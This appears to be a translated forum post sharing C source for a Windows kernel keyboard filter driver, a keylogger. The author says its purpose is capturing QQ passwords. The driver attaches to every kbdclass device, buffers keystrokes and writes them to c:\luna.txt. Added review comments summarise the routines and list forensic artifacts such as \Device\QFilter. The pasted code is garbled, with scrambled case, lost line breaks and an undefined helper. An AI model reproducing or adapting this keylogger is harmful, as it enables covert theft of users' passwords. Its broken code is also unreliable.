This is the Cold River Alone Fishing keyboard filter, slightly modified. It filters the QQ password into a buffer and writes the buffer to a file when a carriage return arrives or the buffer is full. Because the memory that belongs to an IRP is reclaimed quickly once the IRP completes, a global buffer is used. A separate thread does the writing; at first I used a queue to process the IRPs, but that turned out to be relatively slow, so I had to do it this way. The process-creation callback only needs a few more lines of code and is not written here; because that code is missing, treat this as approximate code. Shared for beginners. Please point out any mistakes, thank you.
Seniors, please don't laugh.
Struct.h
/*
 * lstruct.h as pasted on the page. Line breaks were lost and identifier case
 * and spacing were altered, so the text below does not compile as shown.
 *
 * Declarations visible here:
 *  - device_extension: per-device state. Holds this driver's device object,
 *    the device it attached to ("upper"), the lower device that IRPs are
 *    forwarded to, a storage and a target device pointer, the device and
 *    symbolic-link names, a ULONG tag (Pmydevflg) and a remove lock.
 *  - Multvar: a buffer pointer, a KEVENT and a length.
 *  - mybuff: descriptor of the global capture buffer (data pointer, maxsize,
 *    cursize, Offset); buff_size fixes the buffer at 256 bytes.
 *  - My_data: an IRP pointer, a buffer pointer and a LIST_ENTRY.
 *
 * Macros visible here:
 *  - mydeviceflags / mycdodeviceflags: tags stored in Pmydevflg to tell a
 *    filter device from the control device; removetag is a third tag.
 *  - Delay_*: time constants built from -10; presumably negative 100 ns units
 *    for relative kernel timeouts (confirm against the callers).
 *  - IS_MY_DEVICE_OBJECT / Is_my_control_device: compare the extension tag
 *    with the constants above.
 *
 * NOTE(review): both predicate macros use _obj without parenthesising it, and
 * the #ifndef guard has no matching #endif in the text shown.
 */
/************************************///author:duanyueming//data:02/05/2015//file:lstruct.h/****************** /#ifndef _lstruct_h_#define _lstruct_h_typedef struct _device_extension {pdevice_object pdeviceobj ; Pdevice_object Pattachdev; Upper equipment Pdevice_object Plowdevice; Bottom equipment Pdevice_object pstoragedev; The stored device pdevice_object Ptardevice; Target device unicode_string Mydevicename; Unicode_string Mydevicesym; ULONG Pmydevflg;io_remove_lock Movelock;} device_extension,*pdevice_extension;typedef struct _multvar{ PVOID pbuff; KEVENT waitevent; ULONG Length;} Multvar,*pmultvar; #define buff_size 256typedef struct _my_buff{puchar pbuf;int maxsize;int cursize;int Offset;} mybuff,*pmybuff;typedef struct _my_data{ pirp Irp; PVOID Pbuff; List_entry ListEntry;} My_data,*pmydata;
#define mydeviceflags ' LUNA ' #define mycdodeviceflags ' LCDO ' #define removetag ' lmn ' #define Delay_ One_microsecond ( -10) #define Delay_one_millisecond (delay_one_microsecond*1000) #define Delay_one_second (delay_one_millisecond*1000) #define IS_MY_DEVICE_OBJECT (_obj) (((pdevice_extension) _obj->deviceextension)->pmydevflg = = Mycdodeviceflags | | Pdevice_extension (_obj->deviceextension)->PMYDEVFLG = = mydeviceflags) #define Is_my_control_device (_obj) (((pdevice_extension) _obj->deviceextension)->pmydevflg = = mycdodeviceflags)
/*
 * Hand-written prototype for ObReferenceObjectByName, which the page labels
 * as a "not archived" (undocumented) function, together with the extern for
 * IoDriverObjectType. The driver code further down the page passes both to
 * look up the \Driver\kbdclass driver object by name.
 */
/******** not archived function ************/ntstatusobreferenceobjectbyname (punicode_string objectname,ulong Attributes,PACCESS_ State accessstate,access_mask Desiredaccess,pobject_type Objecttype,kprocessor_mode AccessMode,PVOID ParseContext, PVOID *object); extern pobject_type *iodriverobjecttype;
/*
 * Three helpers, collapsed onto one line by the page.
 *
 * lqueryobjectname(lobject, name)
 *   Asks ObQueryNameString for the object's name, first into a 64-WCHAR stack
 *   buffer; on STATUS_INFO_LENGTH_MISMATCH it allocates nonpaged pool of the
 *   reported size and queries again. The result is copied into *name and the
 *   last status is returned.
 *   NOTE(review): no call that frees the pool allocation is visible, and the
 *   copy runs whatever the final status is.
 *
 * luninstalldriver(pdriverobject)
 *   Installed as the unload routine elsewhere on the page. Sets the current
 *   thread to LOW_REALTIME_PRIORITY, walks the driver's device list and, per
 *   device, deletes the symbolic link, detaches from the lower device and
 *   deletes the device object. It then enters `while (1) {}`, so as written
 *   the routine never returns and the final KdPrint is unreachable; an unload
 *   request for this driver would not complete. `time` is computed but not
 *   used in the code shown.
 *
 * ldispatchroutine(pdeviceobject, pirp)
 *   Pass-through dispatch: skips the current stack location and forwards the
 *   IRP to the lower device stored in the device extension. STACK is fetched
 *   but not used.
 */
NTSTATUS lqueryobjectname (PVOID lobject,punicode_string name)//query file name {NTSTATUS status; Pobject_name_information Pbuff; WCHAR cache[64]; ULONG Needlength;pbuff = (pobject_name_information) cache;status = obquerynamestring (lobject,pbuff,64*sizeof (WCHAR), &needlength), if (status = = Status_info_length_mismatch) {Pbuff = (pobject_name_information) ExAllocatePool ( Nonpagedpool,needlength); if (Pbuff = = NULL) {return status_insufficient_resources;} RtlZeroMemory (pbuff,needlength); status = Obquerynamestring (Lobject,pbuff,needlength,&needlength);} name->length = 0; Rtlcopyunicodestring (name,&pbuff->name); return status;} VOID luninstalldriver (Pdriver_object pdriverobject) {pdevice_extension pdevext; Prkthread CurrentThread; Large_integer time; Pdevice_object pdevobj;time = Rtlconvertlongtolargeinteger (100*delay_one_second);pD evobj = pDriverObject-> DeviceObject; CurrentThread = Kegetcurrentthread (); Kesetprioritythread (currentthread,low_realtime_priority); while (pdevobj) {Pdevext = (pdevice_extension) Pdevobj->deviceextension;iodeletesymboliclink (&pdevext->mydevicesym);pD evobj = pDevObj-> Nextdevice;iodetachdevice (Pdevext->plowdevice); Iodeletedevice (pdevext->pdeviceobj);} while (1) {}kdprint (("Driver UnInstall complete,leave\n");} NTSTATUS ldispatchroutine (pdevice_object pdeviceobject,pirp pirp) {pio_stack_location STACK = Iogetcurrentirpstacklocation (PIRP); ioskipcurrentirpstacklocation (PIRP); return IoCallDriver (((PDEVICE_EXTENSION) pdeviceobject->deviceextension)->plowdevice,pirp);}
The following is the code:
/*
 * Main driver source as pasted on the page. Line breaks were lost and
 * identifier case and spacing were altered, so the text does not compile as
 * shown; the author also describes it as approximate code. Summary of what
 * the visible text does, routine by routine:
 *
 * driverentry
 *   Clears iswritedata / isneedfilter, initialises g_list, allocates the
 *   global mybuff descriptor and a buff_size-byte data buffer from nonpaged
 *   pool, installs luninstalldriver as the unload routine, points every major
 *   function at the pass-through ldispatchroutine and then overrides
 *   IRP_MJ_READ, IRP_MJ_POWER and IRP_MJ_DEVICE_CONTROL. It then creates the
 *   control device, attaches to the keyboard class devices and starts a
 *   system thread running processirp.
 *
 * processirp
 *   Endless loop: when iswritedata is set and the buffer exists, calls
 *   mywritedatafile and then zeroes and resets the buffer. No wait or sleep
 *   call is visible inside the loop.
 *
 * powerroutine
 *   Starts the next power IRP, skips the stack location and forwards with
 *   PoCallDriver to the lower device.
 *
 * createmycdodevice
 *   Creates the named control device \Device\QFilter and a symbolic link
 *   named QFilterSym, sets DO_BUFFERED_IO and tags the extension with
 *   mycdodeviceflags.
 *
 * bindkbddriver
 *   References \Driver\kbdclass by name, walks its device objects and, for
 *   each one, creates an unnamed device of the same type and attaches it with
 *   IoAttachDeviceToDeviceStackSafe. Copies the buffered/direct/power-pagable
 *   flags from the lower device, clears DO_DEVICE_INITIALIZING, and sets
 *   StackSize to the lower device's value plus one. Finally points the global
 *   `filename` at \dosdevices\c:\luna.txt.
 *
 * mywritedatafile
 *   Opens or creates `filename` for write (FILE_OPEN_IF, synchronous I/O),
 *   writes cursize bytes from the global buffer and closes the handle.
 *
 * readcompletefun
 *   Completion routine for keyboard reads. On success it walks the
 *   KEYBOARD_INPUT_DATA entries in the IRP's system buffer, converts each
 *   MakeCode with print_keystroke (not defined on this page) and, under the
 *   condition shown, appends the byte to the global buffer and sets
 *   iswritedata. Propagates the pending flag and returns the IRP status.
 *
 * readroutine
 *   Completes the IRP with STATUS_INVALID_DEVICE_REQUEST when CurrentLocation
 *   is 1, completes reads sent to the control device with success, and
 *   otherwise copies the stack location, registers readcompletefun and
 *   forwards the read to the lower device.
 *
 * contrlroutine
 *   Has an empty switch for the control device and forwards every IOCTL to
 *   the lower device.
 *
 * NOTE(review): the global buffer is written from the read completion path
 * and read/reset from the writer thread, and no lock or event is visible
 * between them.
 *
 * Artifacts in this listing that an analyst can search for on a host: the
 * device name \Device\QFilter, the symbolic link QFilterSym, the output file
 * c:\luna.txt, and an unexpected unnamed filter device attached above each
 * \Driver\kbdclass device object. Driver-load telemetry and kernel-mode
 * code-signing enforcement apply to the step that loads such a driver.
 */
#include "QFilter.h" NTSTATUS driverentry (pdriver_object pdriverobject,punicode_string pregistrypath) {int i; NTSTATUS status; HANDLE thread;/******** initializes global variables ***********/iswritedata = False;isneedfilter = False;initializelisthead (&g_list); G_buff = (pmybuff) exallocatepool (nonpagedpool,sizeof (Mybuff)), if (G_buff ==null) {Kdprint (("No Through memory \ n")); return 0;} Else{g_buff->pbuf = (Puchar) exallocatepool (nonpagedpool,buff_size); ASSERT (g_buff->pbuf); g_buff->maxsize = Buff_size;g_buff->offset = 0;g_buff->cursize = 0;} /******** Initialize global variable ***********/pdriverobject->driverunload = luninstalldriver;for (i = 0;i <irp_mj_maximum_ function;i++) {Pdriverobject->majorfunction[i] = ldispatchroutine;} Pdriverobject->majorfunction[irp_mj_read] = Readroutine;pdriverobject->majorfunction[irp_mj_power] = Powerroutine;pdriverobject->majorfunction[irp_mj_device_control] = contrlroutine;//pdriverobject-> Majorfunction[irp_mj_close] = Closeirp;status = Createmycdodevice (pdriverobjeCT); if (! Nt_success (status) {return status;} Status = Bindkbddriver (Pdriverobject); Nt_success (status) {return status;} Status = Pscreatesystemthread (&thread,generic_all,null,null,null,processirp,null); Nt_success (status) {Kdprint ("Create Thread Failed \ n"); return status;} Kdprint ("Start Kbd Filter successfuly \ n"); return status_success;} VOID processirp (PVOID pContext) {//pmydata data; PVOID buff = NULL; for (;;) {//Plist_entry Headdata = Removeheadlist (&g_list);//data = Containing_record (headdata,my_data,listentry); if (I Swritedata = = true&& G_buff->pbuf! 
= NULL) {Kdprint (("hehehehe\n")); Kdprint (("111\n")); Kdprint (("2222\n")); Mywritedatafile (); RtlZeroMemory (g_buff->pbuf,g_buff->maxsize); g_buff->cursize = 0;g_buff->offset = 0;} }}ntstatus powerroutine (pdevice_object pdeviceobj,pirp pirp) {postartnextpowerirp (PIRP); Ioskipcurrentirpstacklocation (PIRP); Return Pocalldriver (((pdevice_extension) pdeviceobj->deviceextension)->PLOWDEVICE,PIRP);} NTSTATUS Createmycdodevice (Pdriver_object pdriverobj) {NTSTATUS status; Unicode_string Devsym; Unicode_string Devname; Pdevice_object Pnewdev; Pdevice_extension Pdevext; Rtlinitunicodestring (&devname,l "\\Device\\QFilter"); status = IoCreateDevice (Pdriverobj,sizeof (device_ EXTENSION), &devname,file_device_unknown,0,true,&pnewdev); if (! Nt_success (status) {Kdprint ("Create CDO devobj Failed \ n")); return status;} Rtlinitunicodestring (&devsym,l "\ \?? \\QFilterSym "); Status = Iocreatesymboliclink (&devsym,&devname); Nt_success (status) {Kdprint ("Create Cdo symbolic Failed \ n"); Iodeletedevice (Pnewdev); return status;} Pnewdev->flags |=do_buffered_io;pdevext = (pdevice_extension) PNEWDEV->DEVICEEXTENSION;PDEVEXT->PMYDEVFLG = Mycdodeviceflags;pdevext->mydevicename = Devname;pdevext->pdeviceobj = Pnewdev;pdevext->mydevicesym = Devsym;return status_success;} NTSTATUS bindkbddriver (Pdriver_object pdriverobj) {unicode_string kbdclass; PdeviCe_object Pnewdev; Pdevice_object Ptardev; Pdevice_object Plowdev; Pdevice_extension Pdevext; Pdriver_object Pkbddrob; NTSTATUS status = Status_success; Rtlinitunicodestring (&kbdclass,l "\\Driver\\kbdclass"); status = Obreferenceobjectbyname (&kbdclass,obj_ Case_insensitive,null,0,*iodriverobjecttype,kernelmode,null, (pvoid*) &pkbddrob); Nt_success (status) {Kdprint ("Load kbdobj Failed:%x\n", status); return status;} Obdereferenceobject (pkbddrob);p Tardev = Pkbddrob->deviceobject;while (ptardev) {status = IoCreateDevice ( Pdriverobj,sizeof (device_extension), Null,ptardev->devicetype,ptardev->characteristics,false,&pnewdev 
); if (! Nt_success (status) {Kdprint ("Create Device failed:%x\n", status); return status;} Else{status = Ioattachdevicetodevicestacksafe (Pnewdev,ptardev,&plowdev); Nt_success (status) {Kdprint ("Bind Failed \ n"); return status;} Pdevext = (pdevice_extension) pnewdev->deviceextension;pnewdev->flags |= plowdev->flags& (DO_BUFFERED_ IO | Do_direct_io | do_power_pagable);p newdev->flags &= ~do_device_initializing;pdevext->pdeviceobj = pNewDev;pDevExt-> PMYDEVFLG = Mydeviceflags;pdevext->plowdevice = Plowdev;pdevext->pattachdev = PTarDev;pNewDev->StackSize = Pdevext->plowdevice->stacksize+1;//ioinitializeremovelock (&pdevext->movelock,0,0,0);} Ptardev = Ptardev->nextdevice;} Rtlinitunicodestring (&filename,l "\\dosdevices\\c:\\luna.txt"); Kdprint (("Complete Device Bind \ n"); return status_success;} VOID Mywritedatafile () {HANDLE handl;object_attributes objattr;io_status_block BLOCK; NTSTATUS status; Initializeobjectattributes (&objattr,&filename,obj_case_insensitive,null,null); status = ZwCreateFile ( &handl,generic_write,&objattr,&block,null,file_attribute_normal,0,file_open_if,file_synchronous_io _nonalert,null,0); if (! Nt_success (status) {Kdprint ("Create File Storage data failed:%x", status); return;} Status = Zwwritefile (handl,null,null,null,&block,g_buff->pbuf,g_Buff->cursize,0,null); if (! Nt_success (status) {Kdprint ("WriteFile failed:%x \ n", status)); Zwclose (Handl); return;} Kdprint (("Code:%c \ n", g_buff->pbuf)); Zwclose (Handl);} NTSTATUS Readcompletefun (pdevice_object pdeviceobj,pirp pirp,pvoid pContext) {ULONG keystructnum; Pkeyboard_input_data ptr; ULONG i; UCHAR asciicode;if (/*isneedfilter &&*/nt_success (pirp->iostatus.status)) {keystructnum = pIrp-> iostatus.information/(pirp->iostatus.information/sizeof (keyboard_input_data)); ptr = (pkeyboard_input_data) pirp->associatedirp.systembuffer; for (i =0; I <keystructnum;++i) {Asciicode = Print_keystroke (Ptr[i]. 
Makecode); if (G_buff->offset >= (buff_size-(5*ucharsize)) | | Asciicode = = ' 0x0D ') {kdprint ("Steup Write Data!!!!!!!!!!!!!!!!!!! \ n ")); Iswritedata =true; Rtlcopymemory (((G_BUFF->PBUF) + (G_buff->offset)), &asciicode,ucharsize); G_buff->offset + = Ucharsize; G_buff->cursize +=ucharsize; } else {IsWrItedata =false; Kdprint (("------Buff small---Start Write Data to file--\ n")); }}} if (pirp->pendingreturned) {iomarkirppending (PIRP); }return Pirp->iostatus.status;} NTSTATUS readroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK; NTSTATUS status = Status_success; if (pirp->currentlocation ==1) {pirp->iostatus.status = Status_invalid_device_request; pirp->iostatus.information = 0; IoCompleteRequest (pirp,io_no_increment); return status_invalid_device_request; } if (Is_my_control_device (pdeviceobj)) {pirp->iostatus.status = status_success; pirp->iostatus.information = 0; IoCompleteRequest (pirp,io_no_increment); return status_success; } stack = Iogetcurrentirpstacklocation (PIRP); Iocopycurrentirpstacklocationtonext (PIRP); Iosetcompletionroutine (pirp,readcompletefun,null,true,true,true); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);} NTSTATUSContrlroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK = iogetcurrentirpstacklocation (PIRP); if (Is_my_control_device (Pdeviceobj)) {switch (Stack->parameters.deviceiocontrol.iocontrolcode) {}}switch (stack-> Parameters.DeviceIoControl.IoControlCode) {default:ioskipcurrentirpstacklocation (PIRP); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);}}
Windows Driver Filter -- kbdclass filter, Cold River Alone Fishing enhanced version